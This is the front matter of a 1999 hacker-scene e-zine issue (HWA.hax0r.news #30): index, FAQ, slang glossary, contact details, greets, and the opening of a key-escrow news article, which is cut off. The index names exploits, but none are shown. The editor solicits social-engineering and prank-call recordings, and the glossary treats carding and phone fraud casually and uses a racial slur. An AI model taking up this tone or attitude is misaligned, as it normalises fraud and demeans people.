[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 30 Volume 1 1999 Aug 21st 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== New mirror sites http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #30 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #30 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Key Escrow bill up for vote again................................ 04.0 .. The lost art of IRC warfare using eggdrop bots................... 05.0 .. Finally a working redhat 5.2 local exploit - From BlackBox issue #1 06.0 .. The State of Crypto today........................................ 07.0 .. Using a backdoor in a firewalled system.......................... 08.0 .. PacketStorm Security Sells Out?.................................. 09.0 .. CryptoGram Aug 15th '99.......................................... 10.0 .. TELNET.EXE HEAP OVERFLOW......................................... 11.0 .. SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE.................... 12.0 .. THE MUSIC INDUSTRIES' "CYBER-SHERRIF"............................ 13.0 .. ReDaTtAcK CHARGED ANYWAYS........................................ 14.0 .. NA/MCAFEE RELEASES NEW VIRUS SERVICE............................. 15.0 .. TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET........... 16.0 .. E-COMMERCE AND PRIVACY........................................... 17.0 .. IDENTITY-THEFT................................................... 18.0 .. Y2K-THE MOVIE.................................................... 19.0 .. 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES......................... 20.0 .. Y2K PROBLEMS..................................................... 21.0 .. GISB WILL USE PGP................................................ 22.0 .. SURF ANONYMOUS FOR $5............................................ 23.0 .. HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER............ 24.0 .. PROJECTGAMMA BACK ONLINE......................................... 25.0 .. DETECTING INTRUDERS IN LINUX..................................... 26.0 .. WIRELESS CRIME-FIGHTING.......................................... 27.0 .. 15-YEAR-OLD ADMITS HACKING INTO TCS.............................. 28.0 .. JAPAN CLEARS WIRETAP BILL........................................ 29.0 .. Warez Groups Hit With Racketeering Charges ...................... 30.0 .. Public UK Sites Susceptible to Attack ........................... 31.0 .. Mitnick Prosecutor Moving to Private Practice ................... 32.0 .. NIPC Head Talks About FidNet .................................... 33.0 .. Spoofing revisited (w00w00)...................................... 34.0 .. 2 Swedish men charged with hacking U.S computers................. 35.0 .. Feds delay network............................................... 36.0 .. The Effects of War on the Yugoslavian Network ................... 37.0 .. Survey Finds Internet Full of Holes ............................. 38.0 .. Hacking Into an IT Career........................................ 39.0 .. SETI@Home, Largest Computation Ever ............................. 40.0 .. Hong Kong Blondes Labeled a Fraud ............................... 41.0 .. Peace Prize Winner Warns of Cyber War ........................... 42.0 .. Mitnick Still Denied Kosher Food ................................ 43.0 .. Cable Pirates Busted ............................................ 44.0 .. CSIS Admits Web Defacement ...................................... 45.0 .. Win32.Kriz Set To Go Off Christmas Day .......................... 46.0 .. MS Windows Media Audio Broke One Day After Release .............. 47.0 .. Available Soon, Freedom! ........................................ 48.0 .. AOL hacking IM users?............................................ 49.0 .. Anti-gay site is hacked.......................................... 50.0 .. Indonesian CyberWar? Or Not? .................................... 51.0 .. Gov Wants to Break Into to Personal Computers, Legally ,,,,,,,,,, 52.0 .. Hearings to be Held on Echelon .................................. 53.0 .. AOL Password Scam Uncovered ..................................... 54.0 .. Bronc's Defcon VII Review ....................................... 55.0 .. Y2K Survival Catalog ............................................ 56.0 .. BELGIAN BANK COMPROMISED......................................... 57.0 .. CARDING IN NEWCASTLE............................................. 58.0 .. U.S.-British Cyber-Spy System Puts European Countries on Edge.... 59.0 .. Watching the digital detectives.................................. 60.0 ,, Microsoft acknowledges software glitch that exposes e-mail passwords 61,0 .. U.S to seek new computer surveillance power...................... 62.0 .. Code cracker worries cryptographers.............................. 63.0 .. AntiOnline offers infosec website hosting........................ 64.0 .. PKI yesterday, today and tomorrow................................ 65.0 .. Microsoft Advisory, double byte code page vulnerability.......... 66.0 .. RHSA denial of service attack in in.telnetd...................... 67.0 .. [EuroHaCk] stealth-code.......................................... 68.0 .. RHSA; buffer overflow in libtermcap tgetent().................... 69.0 .. Possible AOL IM buffer overflow.................................. 70.0 .. L0pht security advisory:Attackers can remotely add default route entries 71.0 .. Setuid bug in Oracle ............................................ 72.0 .. Vulnerability In LSA on Windows NT SP5........................... 73.0 .. w00w00's efnet ircd advisory (exploit included).................. 74.0 .. hiperbomb.c - reboot a hiperarc router........................... 75.0 .. HP Security Bulletins Digest..................................... 76.0 .. cfingerd exploit.................................................. 77.0 .. Microsoft Advisory:Patch Available for "Terminal Server Connection Request Flooding" =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.. ................. Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black eentity ...( '' '' ): Currently active/IRC+ man in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Ken Williams/tattooman of PacketStorm, hang in there Ken...:( & Kevin Mitnick (Happy Birthday) kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ****** + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (No mail worthy of posting here this issue,) 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Issue #30... no comments this issue ... * * * * * * send submissions to: hwa@press.usmc.net */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 Key-Escrow on the Move - Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hackernews.com/ contributed by evilwench They aren't giving up. The Cyberspace Electronic Security Act is currently being drafted by the Clinton administration. In this latest bill, the administration proposes that law enforcement agents have access to decryption keys held by recovery agents. The proposed law also allows the government to obtain search warrants to find decryption keys if they are not held by recovery agents. (Maybe the feeling is that if they keep submitting new bills, one of them, eventually, will get through. Unfortunately they are probably correct.) Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0816/fcw-newsencrypt-08-16-99.html AUGUST 16, 1999 Bill reopens encryption access debate BY DOUG BROWN (dbrown@fcw.com) AND L. SCOTT TILLETT (scott_tillett@fcw.com) Renewing efforts to allow law enforcement agencies to access and read suspected criminals' encrypted electronic files, the Clinton administration has drafted a bill that would give those agencies access to the electronic "keys" held by third parties. The Cyberspace Electronic Security Act, the drafting of which is being led by the Office and Management and Budget and the Justice Department, "updates law enforcement and privacy rules for our emerging world of widespread cryptography," according to an analysis accompanying the bill obtained by Federal Computer Week. Encryption technology, according to the draft, is "an important tool for protecting the privacy of legitimate communications and stored data" but also has been used "to facilitate and hide unlawful activity by terrorists, drug traffickers, child pornographers and other criminals." The new bill seeks to uncover that activity by allowing law enforcement officials to obtain the keys needed to decrypt messages by applying for search warrants or court orders, much as they might do to uncover other evidence. The administration is concerned about the use of encryption technology because advances in recent years have made it extremely difficult for law enforcement officials to crack a code once they have intercepted a message. The draft bill is the Clinton administration's latest effort to push for legislation that would make it easier for law enforcement agencies to intercept messages or data that they think would be helpful in criminal investigations. In 1993 the administration introduced the Clipper Chip, a hardware-based encryption device designed to protect private communications but that would provide a "backdoor" for law enforcement officials to decrypt necessary data. The Clipper effort died after privacy groups and industry warned that law enforcement agencies could abuse the power. "All this is the Clipper Chip revisited in a different flavor but not as effective," said Michael Anderson, president of computer forensics firm New Technologies Inc. The administration also has blocked the export of certain advanced encryption technology that would defeat efforts to conduct digital wiretaps as part of its fight against international drug cartels and terrorists. But the software industry continues to fight for the lifting of export restrictions. In the latest bill, the administration proposes that law enforcement agents have access - under limited circumstances - to decryption keys held by recovery agents, which are third-party warehouses of decryption keys that "unlock" complex codes that mask the readable form of the data. The proposed law also allows the government to obtain search warrants to find decryption keys if they are not held by recovery agents. The proposed bill would provide new protections for lawful users of encryption. Currently, according to a summary of the bill that is part of a proposed letter to House Speaker Dennis Hastert (R-Ill.), there are few laws guiding how recovery agents treat the decryption keys they store. The bill would prohibit recovery agents from disclosing the keys or from using the keys to decrypt data except under certain circumstances, such as when a lawful heir of a deceased person wants decryption keys to the deceased's locked information. The draft bill also prohibits recovery agents from selling or revealing in any way their customer lists to other parties. The new protections, however, are not strong enough to avoid the erosion of privacy rights, said David Sobel, general counsel for the Electronic Privacy Information Center, an advocacy group based in Washington, D.C. "It is not a pro-encryption proposal," he said. "The bottom line is: This is legislation that would increase law enforcement's ability to access encrypted data." It also would serve to lay the legal groundwork for eventually outlawing encryption that does not have decryption keys available to law enforcement, Sobel said. "They could say, 'We have established legal procedures in place, they have been used in several cases. Now our problem is not everybody is using encryption that provides us with...access,' " he said. Barbara Simons, president of the California-based Association for Computing 